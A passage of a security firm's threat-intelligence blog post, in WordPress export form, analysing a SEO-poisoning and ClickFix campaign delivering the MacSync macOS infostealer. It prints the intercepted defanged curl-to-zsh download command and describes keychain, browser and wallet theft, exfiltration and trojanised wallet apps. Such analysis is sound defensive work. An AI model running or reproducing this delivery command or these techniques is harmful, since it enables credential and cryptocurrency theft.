{"id":9966,"date":"2026-07-17T17:11:31","date_gmt":"2026-07-17T17:11:31","guid":{"rendered":"https:\/\/fortgale.com\/blog\/?p=9966"},"modified":"2026-07-17T17:15:55","modified_gmt":"2026-07-17T17:15:55","slug":"macsync-when-the-victim-types-the-attack-chain","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/macsync-when-the-victim-types-the-attack-chain\/","title":{"rendered":"MacSync: when the victim types the attack chain"},"content":{"rendered":"\n\n<!-- ============================================================\n  MacSync: when the victim types the attack chain  (EXTENDED + visuals + chapter headers)\n  Incollare in Gutenberg: editor a codice (Ctrl+Shift+Alt+M) \u2192 incolla \u2192 torna a visuale.\n  TITOLO (campo WP, non nel body): MacSync: when the victim types the attack chain\n  Categoria: Defence \u00b7 Tag: macsync, clickfix, seo poisoning, macos, infostealer, maas\n\n  INTESTAZIONI DI CAPITOLO\/SEZIONE: rese con blocchi \"HTML personalizzato\" (wp:html) e CSS\n  inline (badge numerico = icona di capitolo, marcatore \u25b8 + numero 1.x\/2.x per le sezioni).\n  CSS scelto per superare la sanitizzazione di WP multisite (safecss): niente clip-path.\n  I titoli restano <h2>\/<h3> reali nel DOM (SEO\/TOC ok). Colori = brand token.\n\n  IMMAGINI \u2014 caricare in Media Library (nomi identici). URL usato:\n  https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/<file>.png  (mese = 2026\/07)\n============================================================ -->\n\n\n<p class=\"wp-block-paragraph\">No exploit. No attachment. No phishing email. In this campaign the threat actor needs the victim to do exactly one thing: copy a command from an installation guide and paste it into the macOS Terminal. In the summer of 2026 our SOC intercepted that moment three times, on the same corporate endpoint, and blocked it three times. The target: a developer&#8217;s Mac. The payload: MacSync, an infostealer sold as Malware-as-a-Service and built for the Apple ecosystem.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This article has two halves. The first sets out the general mechanism: why the SEO Poisoning plus ClickFix combination works, why macOS is now a first-class target, and why a Malware-as-a-Service payload breaks classic attribution. The second is the technical evidence from the case our SOC handled: the reconstructed chain, the intercepted command, the code recovered during controlled detonation, and the MITRE ATT&amp;CK and indicator detail.<\/p>\n\n\n\n<figure class=\"wp-block-image alignwide size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/diag1-attack-chain.png\" alt=\"Five-stage attack chain: fraudulent GitHub repo, SEO Poisoning, redirect to external site, ClickFix, payload delivery\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">The end-to-end chain. No stage exploits a software flaw, the only technical control in the path is behavioural detection at the endpoint.<\/figcaption><\/figure>\n\n\n\n<div style=\"background:#0A2952;border-left:5px solid #2B7BFF;padding:16px 22px;margin:48px 0 14px;border-radius:4px;overflow:hidden;\">\n<span style=\"float:left;width:48px;height:48px;line-height:48px;text-align:center;background:#2B7BFF;color:#001B3B;font-family:'JetBrains Mono',monospace;font-weight:700;font-size:21px;border-radius:6px;margin-right:18px;\">01<\/span>\n<span style=\"display:block;font-family:'JetBrains Mono',monospace;font-size:12px;letter-spacing:3px;color:#4D90FF;text-transform:uppercase;\">Chapter 01<\/span>\n<h2 style=\"margin:3px 0 0;padding:0;border:0;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:28px;font-weight:600;color:#E6F0FF;line-height:1.2;\">Part one: the mechanism<\/h2>\n<\/div>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 1.1&nbsp;&nbsp;<\/span>A paradigm shift, not a new exploit<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">For years the mental model of endpoint compromise assumed a technical flaw somewhere: an unpatched CVE, a malicious macro, an attachment that drops a loader. This campaign has none of that. It never touches a vulnerability. It substitutes the exploit with the user, and it does so by weaponising two ordinary behaviours: trusting a top search result, and pasting a command from a guide into a terminal.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">That substitution is what makes the technique dangerous across the board. Perimeter maturity, patch cadence, attachment sandboxing, none of it is in the path. The only controls left standing are behavioural detection at the endpoint and the user&#8217;s own judgement, and the whole campaign is engineered to defeat the second one.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 1.2&nbsp;&nbsp;<\/span>macOS is no longer the quiet platform<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The assumption that macOS is a low-risk environment is now an operational asset for the threat actor, not a fact for the defender. The proliferation of infostealers written specifically for macOS and sold under a MaaS model, MacSync among them, confirms that the Apple ecosystem has become an established target for financially motivated actors.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The target profile explains the interest. Developers, engineers and system administrators run macOS in large numbers, they treat the command line as a daily tool, they pull software from online repositories without a second thought, and they routinely hold exactly what a stealer wants: credentials to corporate infrastructure, cloud tokens, SSH keys, browser sessions and, in many cases, cryptocurrency wallets. The very habits that make these profiles productive are the habits ClickFix exploits.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 1.3&nbsp;&nbsp;<\/span>SEO Poisoning: acquiring the victim<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SEO Poisoning is the deliberate manipulation of the ranking factors search engines use, applied to push malicious content into the top results for chosen queries. The methods are the same ones legitimate SEO uses, turned to a fraudulent end.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Keyword-targeted content builds the malicious page around high-volume queries, typically the name of a popular tool or a commonly searched function. Artificial backlink networks inflate the authority the ranking algorithm perceives. And, decisively here, the campaign hosts its lure on GitHub: a platform with high domain reputation in the eyes of search engines, which speeds high-ranking placement, and high intrinsic trust in the eyes of a technical user, who reads a github.com URL as safe by default.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The result reframes the entire delivery. The victim does not receive a phishing email or click a link someone sent them. They run a search, get a result that looks relevant and legitimate, and follow it, on their own initiative. The suspicion threshold sits far lower than it would for an inbound message, and awareness programmes built only around email phishing never engage.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 1.4&nbsp;&nbsp;<\/span>ClickFix: converting the victim into the delivery vector<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">ClickFix exploits a different psychological lever than classic phishing. It does not ask the user to click a malicious link. It asks them to actively perform a technical action, copying and running a terminal command, presented as a legitimate step in installing, updating or configuring software.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Four factors make it work. Familiarity: for developers and sysadmins, running commands copied from guides and documentation is routine, not anomalous. Absence of the usual phishing tells: no attachment to open, no credential form to fill, no obviously fake domain, only a command that looks generic and harmless. Delegated trust: the user extends the trust they already granted the repository or the site to the command itself, and skips the scrutiny they would apply to an unknown script. And an implicit bypass of perimeter controls: because the action is performed by hand inside a legitimate context, the user&#8217;s own terminal, it sidesteps controls built to block malicious attachments and links, leaving endpoint behavioural detection as the only technical line of defence.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Combined, SEO Poisoning and ClickFix remove the threat actor&#8217;s need for any technical vulnerability in the target. The whole vector rests on the victim&#8217;s voluntary, if deceptively induced, interaction with content they found themselves. That is what makes this class of threat relevant to any organisation, regardless of how mature its perimeter is.<\/p>\n\n\n\n<div style=\"background:#0A2952;border-left:5px solid #2B7BFF;padding:16px 22px;margin:48px 0 14px;border-radius:4px;overflow:hidden;\">\n<span style=\"float:left;width:48px;height:48px;line-height:48px;text-align:center;background:#2B7BFF;color:#001B3B;font-family:'JetBrains Mono',monospace;font-weight:700;font-size:21px;border-radius:6px;margin-right:18px;\">02<\/span>\n<span style=\"display:block;font-family:'JetBrains Mono',monospace;font-size:12px;letter-spacing:3px;color:#4D90FF;text-transform:uppercase;\">Chapter 02<\/span>\n<h2 style=\"margin:3px 0 0;padding:0;border:0;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:28px;font-weight:600;color:#E6F0FF;line-height:1.2;\">Part two: the technical evidence<\/h2>\n<\/div>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.1&nbsp;&nbsp;<\/span>Detection and chain reconstruction<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">During the summer of 2026 our SOC handled an alert on a corporate macOS laptop used by a technical profile (an engineer\/developer) at a client organisation: an attempted execution of a malicious command. Our analysts reconstructed the full sequence, and it matched the mechanism above end to end. The user set out to install what they believed was legitimate software, reached a fraudulent GitHub repository ranked into the search results by SEO Poisoning, followed the fake installation guide it contained, and was redirected to an external site outside GitHub carrying a command line to run in the macOS Terminal.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A telling detail of how convincing the fake process was: the user ran the malicious command three separate times, treating the block as a step that had to succeed to finish the install, not as a warning. All three attempts were blocked before the download could complete.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.2&nbsp;&nbsp;<\/span>The intercepted command<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The command blocked on the endpoint, shown defanged to prevent accidental execution:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl -kfsSL hxxp:\/\/robertjonesrealty[.]com\/curl\/720e1e04c2690ac14874d54823354d6bd06336b23e8458debaffeb2b18f5be6a | zsh<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Reading the flags is instructive, because they were chosen to make the request quiet and robust rather than to look malicious. <code>-s<\/code> silences progress and error output, <code>-f<\/code> makes curl fail quietly on server errors instead of writing an error page to disk, <code>-S<\/code> restores error messages when <code>-s<\/code> is set, <code>-L<\/code> follows redirects (so the staging domain can hand off to another host), and <code>-k<\/code> disables TLS certificate verification, letting the download succeed against a host with a self-signed or invalid certificate. The path component is a 64-character hex string, consistent with a per-victim or per-campaign identifier used to gate and track delivery. The output is piped straight into <code>zsh<\/code>, the default shell on modern macOS, so nothing is ever written to disk as a file the user would see: the script executes in memory, in the user&#8217;s own session.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.3&nbsp;&nbsp;<\/span>Inside MacSync: the recovered code<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">To establish what would have happened had the command not been blocked, our team detonated it in a controlled sandbox and recovered the malware&#8217;s own source. The flow it revealed, and the collection routines it runs, are summarised below, then walked through with the recovered code.<\/p>\n\n\n\n<figure class=\"wp-block-image alignwide size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/diag2-macsync-flow.png\" alt=\"MacSync execution flow: curl to shell, base64 loader, OSA\/AppleScript, killall Terminal, stage and exfil; harvest targets are browser artefacts, keychain, system recon, local wallets, Ledger and Trezor\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">MacSync execution flow reconstructed in the sandbox, and the collection routines it runs. Function names are the malware&#8217;s own.<\/figcaption><\/figure>\n\n\n\n<h4 style=\"margin:28px 0 6px;padding:5px 0 5px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:18px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:12px;letter-spacing:2px;\">&#9656; 2.3.1&nbsp;&nbsp;<\/span>Stage one: the loader<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">The first script fetched by the curl call is base64-encoded and gzip-compressed, a wrapper that defeats trivial string inspection and content filters. It decodes and executes itself in memory with <code>eval<\/code>, so no file is dropped to disk.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/01-loader-base64-gunzip-eval.png\" alt=\"Loader script: zsh, base64 -D piped to gunzip, then eval of the decoded payload variable\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Stage-1 loader: <code>base64 -D | gunzip<\/code> into a variable, then <code>eval<\/code>. In-memory execution, no file on disk.<\/figcaption><\/figure>\n\n\n\n<h4 style=\"margin:28px 0 6px;padding:5px 0 5px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:18px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:12px;letter-spacing:2px;\">&#9656; 2.3.2&nbsp;&nbsp;<\/span>Stage two: the OSA core and anti-detection<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">The decoded payload downloads and runs an OSA (Open Scripting Application) \/ AppleScript component. AppleScript is a native macOS automation layer, which lets the malware drive the operating system and applications through sanctioned interfaces rather than exotic API calls, reducing how anomalous it looks. Before harvesting anything, it closes every open Terminal window to lower the chance the user notices unusual output.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/03-killall-terminal.png\" alt=\"AppleScript snippet: do shell script killall Terminal inside a try block\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Anti-detection: <code>killall Terminal<\/code> before collection begins.<\/figcaption><\/figure>\n\n\n\n<h4 style=\"margin:28px 0 6px;padding:5px 0 5px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:18px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:12px;letter-spacing:2px;\">&#9656; 2.3.3&nbsp;&nbsp;<\/span>Collection routines<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">The OSA script carries a named routine for each data source. <code>SafeSQLiteCopy<\/code> copies browser databases together with their <code>-wal<\/code> and <code>-shm<\/code> journals, so live cookies and session tokens come out intact rather than locked or partial.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/05-safesqlitecopy-browser-db.png\" alt=\"SafeSQLiteCopy routine copying SQLite databases with sqlite3 timeout and cp of -wal and -shm files\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\"><code>SafeSQLiteCopy<\/code>: browser DB theft with WAL\/SHM handling to capture live sessions.<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>grabPlugins<\/code> walks installed browser extensions and lifts their IndexedDB stores, and <code>ChromiumWallets<\/code> matches those extensions against a hardcoded list of crypto-wallet extension IDs, so wallet plugins are singled out for collection.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/08-grabplugins-indexeddb.png\" alt=\"grabPlugins routine iterating extension folders and copying matching plugin IndexedDB data\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\"><code>grabPlugins<\/code>: iterate extensions, copy IndexedDB for matches.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/06-chromiumwallets-extension-ids.png\" alt=\"ChromiumWallets routine with a hardcoded list of crypto-wallet browser extension IDs\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\"><code>ChromiumWallets<\/code>: hardcoded crypto-wallet extension IDs targeted for theft.<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>grabAllStorageKeys<\/code> dumps the macOS keychain through helper files staged at <code>\/tmp\/.kgrab.sh<\/code> and <code>\/tmp\/.kpwd<\/code>, decoding a pre-built shell script from base64 to avoid quote-escaping.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/07-graballstoragekeys-keychain-dump.png\" alt=\"grabAllStorageKeys routine writing a keychain dump helper to \/tmp\/.kgrab.sh and a password to \/tmp\/.kpwd\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\"><code>grabAllStorageKeys<\/code>: keychain dump via <code>\/tmp\/.kgrab.sh<\/code> and <code>\/tmp\/.kpwd<\/code>.<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><code>Processes<\/code> records <code>system_profiler<\/code>, <code>ps ax<\/code> and <code>lsappinfo<\/code> output for host fingerprinting, while <code>DesktopWallets<\/code> and <code>Filegrabber<\/code> pull local wallet folders and targeted files wholesale.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/04-processes-desktopwallets-filegrabber.png\" alt=\"Processes, DesktopWallets and Filegrabber routines running lsappinfo, ps ax and grabbing wallet folders\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\"><code>Processes<\/code>, <code>DesktopWallets<\/code>, <code>Filegrabber<\/code>: host recon and wholesale wallet-folder collection.<\/figcaption><\/figure>\n\n\n\n<h4 style=\"margin:28px 0 6px;padding:5px 0 5px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:18px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:12px;letter-spacing:2px;\">&#9656; 2.3.4&nbsp;&nbsp;<\/span>Staging, single-run lock and version tag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Collected data is written to a randomised <code>\/tmp\/sync&lt;random&gt;<\/code> working folder, guarded by a lock file (<code>\/tmp\/macsync_&lt;token&gt;.lock<\/code>) so the stealer runs once per host.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/09-writemind-tmp-sync-lockfile.png\" alt=\"AppleScript setting writemind to \/tmp\/sync plus a random number and a lock file at \/tmp\/macsync_token.lock\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Working folder <code>\/tmp\/sync&lt;random&gt;<\/code> and single-run lock <code>\/tmp\/macsync_&lt;token&gt;.lock<\/code>.<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The malware stamps its own build into the collected set, an operator convenience that betrays a maintained, versioned MaaS product rather than a one-off. It also runs <code>system_profiler<\/code> for software, hardware and display details.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/10-version-fingerprint-system-profiler.png\" alt=\"Routine writing MacSync Stealer, Build Tag New build 2, Version 1.1.2_release x64_86 and ARM, plus system_profiler output\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Self-reported fingerprint: <code>MacSync Stealer \u00b7 Build Tag \"New build 2\" \u00b7 1.1.2_release (x64_86 &amp; ARM)<\/code>.<\/figcaption><\/figure>\n\n\n\n<h4 style=\"margin:28px 0 6px;padding:5px 0 5px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:18px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:12px;letter-spacing:2px;\">&#9656; 2.3.5&nbsp;&nbsp;<\/span>Exfiltration<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">A <code>daemon_function<\/code> uploads the archive in chunks to the C2, authenticated with a hardcoded <code>api-key<\/code> header and a spoofed macOS <code>User-Agent<\/code>, to a <code>\/dynamic<\/code> endpoint keyed by the same 64-character token seen in the initial URL.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/02-daemon-function-exfil-chunked-upload.png\" alt=\"daemon_function with domain, token, api_key variables and a chunked curl upload to a \/dynamic endpoint\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\"><code>daemon_function<\/code>: chunked upload to <code>\/dynamic?txd=&lt;token&gt;<\/code> with an <code>api-key<\/code> header and spoofed User-Agent.<\/figcaption><\/figure>\n\n\n\n<h4 style=\"margin:28px 0 6px;padding:5px 0 5px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:18px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:12px;letter-spacing:2px;\">&#9656; 2.3.6&nbsp;&nbsp;<\/span>The wallet endgame<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">The final routine is the most revealing about intent. If <strong>Ledger Live<\/strong> or <strong>Trezor Suite<\/strong>, the companion desktop apps for the two most common hardware wallets, are installed, MacSync downloads a trojanised build from the C2 and swaps out the genuine application bundle, replacing <code>app.asar<\/code> and <code>Info.plist<\/code> inside <code>\/Applications<\/code>. This is persistence aimed squarely at the money: rather than hooking a system service, the threat actor plants itself inside the applications the victim uses to manage crypto assets, positioned to intercept future wallet interactions. It is compromise-for-theft dressed as persistence.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/11-ledger-live-replacement.png\" alt=\"Routine building LEDGERURL to a trojanised Ledger Live build and replacing app.asar and Info.plist in the installed app\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Ledger Live swap: trojanised build pulled from the C2, <code>app.asar<\/code> and <code>Info.plist<\/code> replaced.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/12-trezor-suite-replacement.png\" alt=\"Equivalent routine for Trezor Suite, downloading a trojanised build and replacing the installed app\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Trezor Suite swap: identical technique against the second hardware-wallet app.<\/figcaption><\/figure>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.4&nbsp;&nbsp;<\/span>Attribution: a cluster, not an actor<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Our Threat Intelligence team tracks this activity as the <strong>Pulsar MacSync<\/strong> cluster, one of the 287 adversary groups and offensive tools currently in our CTI scope. The word cluster is deliberate. It groups campaigns that share TTPs, distribution infrastructure and final payload, for correlation and detection. It does not name a criminal group, and it is not meant to. The elements gathered in this case do not support attribution to a single actor, and are not intended to.<\/p>\n\n\n\n<figure class=\"wp-block-image alignwide size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2026\/07\/diag3-maas-attribution.png\" alt=\"MaaS attribution model: one developer sells the same MacSync build to multiple unrelated affiliates who run their own campaigns and share or resell C2 infrastructure\" loading=\"lazy\" \/><figcaption class=\"wp-block-caption\">Why attribution breaks under Malware-as-a-Service: development and operation are decoupled, the same build reaches unrelated affiliates.<\/figcaption><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The reason is structural, not a shortfall of analysis. Classic attribution correlates C2 infrastructure, distinctive TTPs, code artefacts and, where available, geopolitical or motivational signals, and it implicitly assumes a stable link between an actor and its tools, that whoever builds the malware also operates it. The MaaS model severs that link. Development sits with one actor or small team, responsible for maintaining the stealer, evolving it and keeping it evasive, and selling it as a product or on an affiliate revenue-share. Operation, building campaigns, choosing distribution vectors, running the first-layer infrastructure (repositories, redirect sites, staging domains), is delegated to many affiliates or customers who may have no relationship to one another. And the C2 infrastructure is shared, reconfigured and resold between affiliates over time, dissolving the anchor attribution traditionally leans on.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">So two campaigns delivering the same MacSync build, with the same technical capabilities and even similar distribution TTPs, can be run by two entirely separate groups whose only connection is having bought the same product on the same market. Attributing a MacSync campaign to a single intrusion set would confuse the manufacturer of a tool with whoever wields it, and would point response and defensive priorities at a target that does not exist.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The practical consequence drives the defensive posture. Once attribution to an actor loses operational meaning, detection has to anchor on the TTPs and behavioural indicators shared across campaigns using the same malware or the same distribution technique, whoever runs them. Static indicators (domains, hashes) rotate in days in a MaaS economy; the behavioural pattern (curl piped to a shell from a fresh domain, Terminal processes killed, archives staged in <code>\/tmp<\/code>, trojanised wallet apps) persists across affiliates.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Nothing in the case points to targeting of this client, this sector or this country. SEO Poisoning on generic queries is a net, not a spear. That does not shrink the threat, it widens it: any organisation with macOS endpoints in technical hands is inside the exposure surface.<\/p>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.5&nbsp;&nbsp;<\/span>MITRE ATT&amp;CK mapping<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Tactic<\/th><th>Technique<\/th><th>ID<\/th><\/tr><\/thead><tbody><tr><td>Resource Development<\/td><td>Stage Capabilities: SEO Poisoning<\/td><td><code>T1608.006<\/code><\/td><\/tr><tr><td>Execution<\/td><td>User Execution: Malicious Copy and Paste<\/td><td><code>T1204.004<\/code><\/td><\/tr><tr><td>Execution<\/td><td>Command and Scripting Interpreter: Unix Shell<\/td><td><code>T1059.004<\/code><\/td><\/tr><tr><td>Execution<\/td><td>Command and Scripting Interpreter: AppleScript<\/td><td><code>T1059.002<\/code><\/td><\/tr><tr><td>Command and Control<\/td><td>Ingress Tool Transfer<\/td><td><code>T1105<\/code><\/td><\/tr><tr><td>Defense Evasion<\/td><td>Deobfuscate\/Decode Files or Information (base64 + gzip)<\/td><td><code>T1140<\/code><\/td><\/tr><tr><td>Defense Evasion<\/td><td>Impair Defenses \/ kill Terminal processes<\/td><td><code>T1562<\/code><\/td><\/tr><tr><td>Credential Access<\/td><td>Credentials from Password Stores: Keychain<\/td><td><code>T1555.001<\/code><\/td><\/tr><tr><td>Credential Access<\/td><td>Credentials from Web Browsers<\/td><td><code>T1555.003<\/code><\/td><\/tr><tr><td>Discovery<\/td><td>System Information Discovery (system_profiler)<\/td><td><code>T1082<\/code><\/td><\/tr><tr><td>Discovery<\/td><td>Process Discovery<\/td><td><code>T1057<\/code><\/td><\/tr><tr><td>Collection<\/td><td>Data from Local System<\/td><td><code>T1005<\/code><\/td><\/tr><tr><td>Collection<\/td><td>Archive Collected Data<\/td><td><code>T1560<\/code><\/td><\/tr><tr><td>Exfiltration<\/td><td>Exfiltration Over C2 Channel<\/td><td><code>T1041<\/code><\/td><\/tr><tr><td>Persistence<\/td><td>Compromise Host Software Binary (trojanised Ledger\/Trezor)<\/td><td><code>T1554<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 style=\"margin:34px 0 8px;padding:6px 0 6px 14px;border-left:3px solid #2B7BFF;font-family:'IBM Plex Sans','Inter',sans-serif;font-size:21px;font-weight:600;color:#0F1117;line-height:1.3;\"><span style=\"font-family:'JetBrains Mono',monospace;color:#1257C7;font-size:13px;letter-spacing:2px;\">&#9656; 2.6&nbsp;&nbsp;<\/span>Indicators of Compromise<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Indicator (defanged)<\/th><th>Type<\/th><th>Role<\/th><\/tr><\/thead><tbody><tr><td><code>robertjonesrealty[.]com<\/code><\/td><td>Domain<\/td><td>Staging + C2: payload delivery (<code>\/curl\/<\/code>, 